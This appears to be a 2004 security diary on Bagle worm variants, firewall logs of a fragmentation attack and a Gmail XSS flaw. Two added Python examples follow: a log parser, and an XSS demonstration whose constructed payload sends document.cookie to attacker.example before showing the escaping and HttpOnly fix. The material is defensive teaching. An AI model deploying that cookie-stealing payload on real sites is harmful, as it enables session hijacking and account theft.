Last Updated: 2004-10-30 04:13:28 UTC
by Lenny Zeltser (Version: 1)
We received many reports of a new Bagle/Beagle worm variant seen in the wild today. Be sure to update your anti-virus signatures, if you haven't done so already.
It seems that there are actually three different variants out there, but they exhibit similar characteristics: they spread via email and P2P networks, listen on TCP port 81, and attempt to download files from pre-defined web servers.
We received a couple of reports of systems initiating outbound connections on TCP port 81. According to one of these reports (thanks, Mark!), the systems were infected with an older Bagle variant (Beagle.AI, according to McAfee), which is a bit strange. If you've witnessed outbound connections on TCP port 81, please send us your packet traces.
As far as I know, the file that the worm attempts to retrieve from the remote servers is currently not present on any of the servers. One theory (thanks, Vern!) is that the worm may be connecting to remote web servers via HTTP simply to leave a record of itself in the server's access or error logs, giving the author a list of infected systems that he or she can then access via inbound connections to TCP port 81.
The naming of these variants is inconsistent across vendors. I wish anti-virus vendors could agree on the taxonomy, as having different names generates a lot of confusion among anti-virus software users. As far as I can tell, the following names refer to the same variant:
Bagle.AV (Sophos, Symantec)
Bagle.AQ (Computer Associates, Norman)
Bagle.AP, Beagle.AT (F-Secure)
Bagle.AT (Kaspersky, TrendMicro)
The following names seem to refer to a slightly different variant:
Yet another variant carries the following names:
Bagle.AR (Computer Associates)
Secunia offers a page with links to several vendors' descriptions of today's Bagle/Beagle variants:
Have you witnessed fragmentation attacks recently?
A bit less than two weeks ago we received a report of a fragmentation attack targeting two unrelated financial services organizations. We'd like to understand that attack better. Here are a few log entries that document the attack:
Oct 15, 7:59pm > firewall_name: NetScreen device_id=firewall_name [Root]system-critical-00440: Fragmented traffic! From xxx.xxx.xxx.59:4591 to xxx.xxx.xxx.xxx:53, proto UDP (zone Untrust, int ethernet1/2.97). Occurred 1 times.
Oct 15, 7:59pm > firewall_name: NetScreen device_id=firewall_name [Root]system-critical-00440: Fragmented traffic! From xxx.xxx.xxx.12:4591 to xxx.xxx.xxx.xxx:53, proto UDP (zone Untrust, int ethernet1/2.97). Occurred 1 times.
FW-1: OPSEC Oct 15, 7:58pm > ctl inbound E100B3 (null) -> (null) router log: Virtual defragmentation error: Timeout (xxx.xxx.xxx.4 -> xxx.xxx.xxx.xxx proto 17 id 63039 len 0 offset 0) - 5 fragments dropped during the last 60 seconds
FW-1: OPSEC Oct 15, 7:57pm > ctl inbound E100B3 (null) -> (null) router log: Virtual defragmentation error: Timeout (xxx.xxx.xxx.4 -> xxx.xxx.xxx.xxx proto 17 id 2629 len 0 offset 0) - 4 fragments dropped during the last 60 seconds
If you've recently witnessed fragmentation attacks of this nature, please send us the relevant packet captures or log entries.
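If you want to pull fragmentation events out of firewall logs like the ones above and total them per source, here is an added example (not part of the original diary) that normalizes the two formats shown, NetScreen "Fragmented traffic!" lines and FW-1 "Virtual defragmentation error" lines, into one record type and counts fragments per source/destination/protocol. The sample lines are constructed from the quoted entries with documentation addresses substituted for the masked ones; the regular expressions are written against the exact field layout quoted above and are an assumption for any other firmware version.

```python
import re
from collections import Counter

# Constructed sample lines modelled on the NetScreen and FW-1 entries quoted above.
# The addresses are RFC 5737 / private placeholders, not real hosts.
SAMPLE_LOGS = [
    "Oct 15, 7:59pm > firewall_name: NetScreen device_id=firewall_name [Root]system-critical-00440: "
    "Fragmented traffic! From 10.0.0.59:4591 to 192.0.2.10:53, proto UDP (zone Untrust, int ethernet1/2.97). Occurred 1 times.",
    "Oct 15, 7:59pm > firewall_name: NetScreen device_id=firewall_name [Root]system-critical-00440: "
    "Fragmented traffic! From 10.0.0.12:4591 to 192.0.2.10:53, proto UDP (zone Untrust, int ethernet1/2.97). Occurred 1 times.",
    "FW-1: OPSEC Oct 15, 7:58pm > ctl inbound E100B3 (null) -> (null) router log: Virtual defragmentation error: "
    "Timeout (10.0.0.4 -> 192.0.2.10 proto 17 id 63039 len 0 offset 0) - 5 fragments dropped during the last 60 seconds",
    "FW-1: OPSEC Oct 15, 7:57pm > ctl inbound E100B3 (null) -> (null) router log: Virtual defragmentation error: "
    "Timeout (10.0.0.4 -> 192.0.2.10 proto 17 id 2629 len 0 offset 0) - 4 fragments dropped during the last 60 seconds",
]

# NetScreen: one event per line, with a per-line "Occurred N times" counter.
NETSCREEN_RE = re.compile(
    r"Fragmented traffic! From (?P<src>[\d.]+):(?P<sport>\d+) to (?P<dst>[\d.]+):(?P<dport>\d+), "
    r"proto (?P<proto>\w+) .*Occurred (?P<count>\d+) times"
)
# FW-1: the reassembly timeout summary, with a count of fragments dropped in the last minute.
FW1_RE = re.compile(
    r"Virtual defragmentation error: (?P<reason>\w+) \((?P<src>[\d.]+) -> (?P<dst>[\d.]+) "
    r"proto (?P<proto>\d+) id (?P<ipid>\d+) len (?P<len>\d+) offset (?P<offset>\d+)\) - "
    r"(?P<count>\d+) fragments dropped"
)

IP_PROTO_NAMES = {"1": "ICMP", "6": "TCP", "17": "UDP"}


def parse_fragment_event(line):
    """Normalise one NetScreen or FW-1 fragmentation line into a dict, or None if neither matches."""
    m = NETSCREEN_RE.search(line)
    if m:
        return {
            "vendor": "netscreen",
            "src": m["src"], "dst": m["dst"],
            "proto": m["proto"].upper(),
            "dport": int(m["dport"]),
            "fragments": int(m["count"]),
        }
    m = FW1_RE.search(line)
    if m:
        return {
            "vendor": "fw1",
            "src": m["src"], "dst": m["dst"],
            # FW-1 logs the IP protocol number; map it to a name where we know one.
            "proto": IP_PROTO_NAMES.get(m["proto"], m["proto"]),
            "dport": None,          # port is not visible once the transport header is fragmented away
            "fragments": int(m["count"]),
            "reason": m["reason"],
            "ipid": int(m["ipid"]),
        }
    return None


def summarise(lines):
    """Total fragments per (src, dst, proto) across both firewall formats."""
    totals = Counter()
    for line in lines:
        ev = parse_fragment_event(line)
        if ev:
            totals[(ev["src"], ev["dst"], ev["proto"])] += ev["fragments"]
    return totals


if __name__ == "__main__":
    for key, n in summarise(SAMPLE_LOGS).most_common():
        print(f"{key[0]:>15} -> {key[1]:<15} {key[2]:<4} fragments={n}")
```

Feeding real syslog output through summarise() gives a quick per-source ranking that is easier to compare across the two victims than the raw lines; the FW-1 record keeps the IP ID so repeated timeouts for the same datagram can be spotted.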
An XSS hole reported in Gmail
According to a Nana NetLife Magazine report, there is a cross-site scripting (XSS) vulnerability in Gmail, Google's webmail service. The flaw allows an attacker to steal a Gmail user's authentication cookie, providing access to the victim's account without having to know the password. The article states that Google is in the process of addressing the problem:
XSS issues are present in many, many web applications. Unfortunately, many organizations are not set up to prevent XSS flaws during the software development cycle, and are quick to dismiss XSS vulnerabilities as being unreasonably difficult to exploit. In reality, the execution of XSS attacks is often not very challenging, and the exposure can be significant.
The iDefense paper "The Evolution of Cross-Site Scripting Attacks" provides an excellent overview of XSS-related issues. You can access it at the following URL; the site requires (free) registration:
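To make the cookie-theft scenario concrete, here is an added example (not from the diary, the Nana report, or Gmail's code) showing the shape of the flaw and the fix in a webmail-style renderer: a constructed message body carrying an event-handler payload that ships document.cookie to an attacker host, a rendering function that interpolates it unescaped, the same function with context-appropriate HTML escaping, and a session cookie marked HttpOnly so that script cannot read it even when an injection succeeds. The hostname attacker.example and the function names are placeholders for illustration.

```python
import html
from http.cookies import SimpleCookie

# Constructed attacker payload: a message body that, if rendered unescaped in the
# victim's browser, loads a bogus image and on failure sends the victim's cookies
# to an attacker-controlled host. attacker.example is a placeholder, not a real host.
PAYLOAD = ("<img src=\"x\" onerror=\"new Image().src="
           "'http://attacker.example/c?'+document.cookie\">")


def render_message_vulnerable(subject, body):
    """Webmail-style rendering that drops untrusted fields straight into HTML."""
    return f"<h2>{subject}</h2>\n<div class=\"body\">{body}</div>"


def render_message_hardened(subject, body):
    """Same markup, but every untrusted field is HTML-escaped for element content,
    so '<', '>', '&' and quotes from the message cannot open a tag or attribute."""
    return (f"<h2>{html.escape(subject, quote=True)}</h2>\n"
            f"<div class=\"body\">{html.escape(body, quote=True)}</div>")


def payload_survives(rendered, payload=PAYLOAD):
    """True if the payload reaches the output verbatim, i.e. as live markup rather than text."""
    return payload in rendered


def session_cookie_header(session_id):
    """Set-Cookie value for the session. HttpOnly keeps the cookie out of document.cookie,
    so a successful script injection still cannot read it; Secure keeps it off plaintext HTTP."""
    jar = SimpleCookie()
    jar["SID"] = session_id
    jar["SID"]["httponly"] = True
    jar["SID"]["secure"] = True
    jar["SID"]["path"] = "/"
    return jar.output(header="").strip()


if __name__ == "__main__":
    subject = "Re: invoice"
    print("vulnerable render leaks payload:", payload_survives(render_message_vulnerable(subject, PAYLOAD)))
    print("hardened render leaks payload:  ", payload_survives(render_message_hardened(subject, PAYLOAD)))
    print("hardened output:", render_message_hardened(subject, PAYLOAD))
    print("Set-Cookie:", session_cookie_header("0123abcd"))
```

Escaping has to match the context the data lands in: html.escape is right for element content and quoted attribute values, but not for data placed inside a script block, a URL, or an unquoted attribute. The HttpOnly flag limits the damage of cookie theft; it does not stop an injected script from acting as the user within the page.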